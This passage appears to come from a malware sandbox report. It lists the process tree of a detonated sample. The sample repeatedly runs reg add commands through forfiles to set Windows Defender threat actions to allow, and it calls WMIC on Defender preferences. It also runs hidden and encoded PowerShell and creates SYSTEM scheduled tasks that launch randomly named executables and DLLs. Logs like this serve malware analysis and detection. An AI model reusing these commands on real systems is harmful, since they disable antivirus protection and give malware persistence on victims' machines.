/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:8872

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:5196

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:7224

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:5240

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:3744

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:6412

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:8344

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:7020

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:8284

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:8260

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:7008

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:6008

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:7260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5920

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:8232

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:6540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:6516

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:8872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:6776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:8464

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:8516

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:8348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:5812

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:6228

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:5920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:5304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:9796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:8752

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:7684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:5448

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:5152

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:7876

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:7260

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:9584

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:6764

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:4124

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:5592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:6800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:7300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:3328

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:4588

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:8352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZTNkTKukmvvbOMPkn" /SC once /ST 13:44:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\bqZHxEQ.exe\" 0c /fNuMdidwA 385118 /S" /V1 /F
2⤵
- Creates scheduled task(s)
PID:7408

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ZTNkTKukmvvbOMPkn"
2⤵
PID:7200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5424 -s 856
2⤵
- Program crash
PID:9104

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:8848

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:7900

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2c8 0x3fc
1⤵
PID:9696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:4976

C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
1⤵
PID:7364

C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
C:\Users\Admin\AppData\Local\Temp\a\Newoff.exe
1⤵
PID:5300

C:\ProgramData\cmd.exe
C:\ProgramData\cmd.exe
1⤵
PID:8792

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\JpxEUBN.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\JpxEUBN.exe 0c /lohzdiddg 385118 /S
1⤵
PID:6756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:8640

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:7104

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:5788

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:8384

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:4912

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:6680

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:7360

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:6492

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:4476

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:8412

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:9808

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:4428

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:6760

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:6292

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:7060

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:8096

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:8100

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "btZaCbGShXZoJDfvCg"
2⤵
PID:8304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &
2⤵
PID:7600

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
3⤵
PID:9456

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
4⤵
PID:6612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5616

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
PID:7352

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\hsUwQAlMU\GJOIwj.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ucrVpivlTlXwlAC" /V1 /F
2⤵
- Creates scheduled task(s)
PID:1500

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ucrVpivlTlXwlAC2" /F /xml "C:\Program Files (x86)\hsUwQAlMU\cPSfsNv.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:7688

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "ucrVpivlTlXwlAC"
2⤵
PID:3496

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ucrVpivlTlXwlAC"
2⤵
PID:10220

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXuMbmSriUtfuo" /F /xml "C:\Program Files (x86)\dlfHiRefefjU2\HmHGSLb.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:6412

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ZEKxHChbZmoqN2" /F /xml "C:\ProgramData\nivjmgppGaMJQQVB\BpuwQtE.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:1140

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "GJlNcuNKEmfKGuMTK2" /F /xml "C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\yTWeHef.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:10044

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jVeWQSRcqyudsTDYlcg2" /F /xml "C:\Program Files (x86)\QtKEgKYoTGTqC\jSTbVSQ.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:8176

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "BjyVbWVaXyfCTlHuI" /SC once /ST 04:22:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\QqEAMUespgTHJnVz\pBWAvOjS\PyURJyN.dll\",#1 /zUdidi 385118" /V1 /F
2⤵
- Creates scheduled task(s)
PID:9064

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "BjyVbWVaXyfCTlHuI"
2⤵
PID:1980

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ZTNkTKukmvvbOMPkn"
2⤵
PID:6320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6756 -s 2308
2⤵
- Program crash
PID:5348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 5892 -ip 5892
1⤵
PID:3616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:6856

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5896

C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\bqZHxEQ.exe
C:\Windows\Temp\QqEAMUespgTHJnVz\WeEdkAGsJlpiURx\bqZHxEQ.exe 0c /fNuMdidwA 385118 /S
1⤵
PID:5308

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:9968

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:10232

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:8252

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:3296

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:5580

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:3088

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:8036

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:2928

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
